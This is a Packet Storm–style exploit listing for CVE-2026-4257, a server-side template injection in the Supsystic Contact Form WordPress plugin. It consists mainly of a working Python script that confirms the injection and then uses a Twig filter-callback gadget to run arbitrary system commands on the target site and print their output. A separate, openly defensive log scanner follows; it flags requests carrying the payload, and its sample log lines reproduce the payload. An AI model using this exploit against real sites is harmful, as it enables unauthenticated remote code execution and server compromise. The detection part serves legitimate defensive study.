Contact Form by Supsystic 1.7.36 Server-Side Template Injection

๐Ÿ—“๏ธย 11 May 2026ย 00:00:00Reported byย Groovy MarkTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 82ย Views

Supsystic Contact Form 1.7.36 is vulnerable to server-side template injection (SSTI), which enables remote command execution.

Related

| Family | Title | Published | Views |
|---|---|---|---|
| GithubExploit | Exploit for CVE-2026-4257 | 18 Apr 2026 19:39 | – |
| GithubExploit | Exploit for CVE-2026-4257 | 11 May 2026 05:24 | – |
| ATTACKERKB | CVE-2026-4257 | 30 Mar 2026 21:26 | – |
| Circl | CVE-2026-4257 | 30 Mar 2026 22:20 | – |
| CNNVD | WordPress plugin Contact Form by Supsystic code injection vulnerability | 30 Mar 2026 00:00 | – |
| CVE | CVE-2026-4257 | 30 Mar 2026 21:26 | – |
| Cvelist | CVE-2026-4257 Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality | 30 Mar 2026 21:26 | – |
| Exploit DB | WordPress Plugin Supsystic Contact Form 1.7.36 - SSTI | 14 May 2026 00:00 | – |
| EUVD | EUVD-2026-17239 | 31 Mar 2026 00:31 | – |
| Metasploit | Supsystic Contact Form Wordpress Plugin SSTI RCE | 26 May 2026 19:01 | – |

Code
```python
import requests
import argparse
import re
import urllib.parse

def check_ssti(url, field_name):
    print(f"[*] Testing SSTI on {url} with field {field_name}...")
    
    # Simple arithmetic test
    test_payload = "{{7*7}}"
    params = {
        "cfsPreFill": "1",
        field_name: test_payload
    }
    target_url = f"{url}?{urllib.parse.urlencode(params)}"
    
    try:
        response = requests.get(target_url, verify=False, timeout=10)
        if "49" in response.text:
            print("[+] SSTI confirmed! Found '49' in response.")
            return True
        else:
            print("[-] SSTI test failed. '49' not found in response.")
            return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

def trigger_rce(url, field_name, command):
    print(f"[*] Triggering RCE: {command}")
    
    # Payload to register system as a filter callback and then call it
    # We use forms.params.fields.1.value and fields.2.value to avoid quote escaping
    # last_name will be 'system', email will be the command
    payload = "{{_self.env.registerUndefinedFilterCallback(forms.params.fields.1.value)}}{{_self.env.getFilter(forms.params.fields.2.value)}}"
    
    params = {
        "cfsPreFill": "1",
        field_name: payload,
        "last_name": "system",
        "email": command
    }
    
    target_url = f"{url}?{urllib.parse.urlencode(params)}"
    
    try:
        response = requests.get(target_url, verify=False, timeout=10)
        print(f"[*] Response Status: {response.status_code}")
        
        # Look for common patterns in the response that might indicate success
        # The output usually appears in the 'value' attribute of the first field
        match = re.search(r'name="fields\[' + field_name + r'\]" value="([^"]+)"', response.text)
        if match:
            print("[!] RCE SUCCESS! Output:")
            print("----------------------------------------")
            print(match.group(1))
            print("----------------------------------------")
            return True
        else:
            print("[-] Could not find command output in response. Check the response body manually.")
            return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    print("""
CVE-2026-4257
Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality

-------------------------------------------------
    """)
    
    parser = argparse.ArgumentParser(description="PoC for CVE-2026-4257 (SSTI to RCE in Contact Form by Supsystic)")
    parser.add_argument("-u", "--url", required=True, help="URL of the page with the form")
    parser.add_argument("-f", "--field", required=True, help="Name of the form field (e.g., first_name)")
    parser.add_argument("-c", "--cmd", default="whoami", help="Command to execute")
    
    args = parser.parse_args()
    
    if check_ssti(args.url, args.field):
        trigger_rce(args.url, args.field, args.cmd)
```
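A defender-side check, added here and not part of the Packet Storm PoC or the plugin: it scans web-server access-log lines for requests that hit the `cfsPreFill` prefill path with Twig-style template syntax in any query parameter, and rates lines that also carry the `_self.env` filter-callback gadget seen in the PoC as high. The log lines and IP addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format access-log lines; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [11/May/2026:10:01:02 +0000] "GET /contact/?cfsPreFill=1&first_name=Alice HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [11/May/2026:10:01:07 +0000] "GET /contact/?cfsPreFill=1&first_name=%7B%7B7*7%7D%7D HTTP/1.1" 200 5133 "-" "python-requests/2.31"
203.0.113.9 - - [11/May/2026:10:01:09 +0000] "GET /contact/?cfsPreFill=1&first_name=%7B%7B_self.env.registerUndefinedFilterCallback(forms.params.fields.1.value)%7D%7D&last_name=system&email=id HTTP/1.1" 200 5200 "-" "python-requests/2.31"
198.51.100.2 - - [11/May/2026:10:02:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Twig output / statement delimiters after URL-decoding.
TEMPLATE_RE = re.compile(r'\{\{.*?\}\}|\{%.*?%\}', re.S)
# Environment-access gadget the PoC above relies on.
GADGET_RE = re.compile(r'_self\.env|registerUndefinedFilterCallback|getFilter\(', re.I)

def classify_request(line):
    """Return None for a benign line, else a dict describing the suspicious request."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    params = parse_qsl(query, keep_blank_values=True)  # parse_qsl decodes %xx escapes
    if not any(k == "cfsPreFill" for k, _ in params):
        return None  # prefill path not exercised; nothing to flag
    hits = [(k, v) for k, v in params if TEMPLATE_RE.search(v)]
    if not hits:
        return None
    severity = "high" if any(GADGET_RE.search(v) for _, v in hits) else "medium"
    return {"ip": m.group("ip"), "ts": m.group("ts"), "severity": severity,
            "fields": [k for k, _ in hits], "status": int(m.group("status"))}

def scan_log(text):
    """Classify every line of an access log and keep only the flagged ones."""
    return [r for r in (classify_request(l) for l in text.splitlines()) if r]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Template delimiters in a prefill parameter are not expected from legitimate visitors, so even the medium-severity arithmetic probe is worth an alert; the gadget strings indicate an attempt to reach command execution.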


Scores as of 11 May 2026 00:00 (current):
Vulners AI Score: 6.1 (Medium risk)
CVSS 3.1: 9.8
EPSS: 0.41475
SSVC: not stated
Views: 82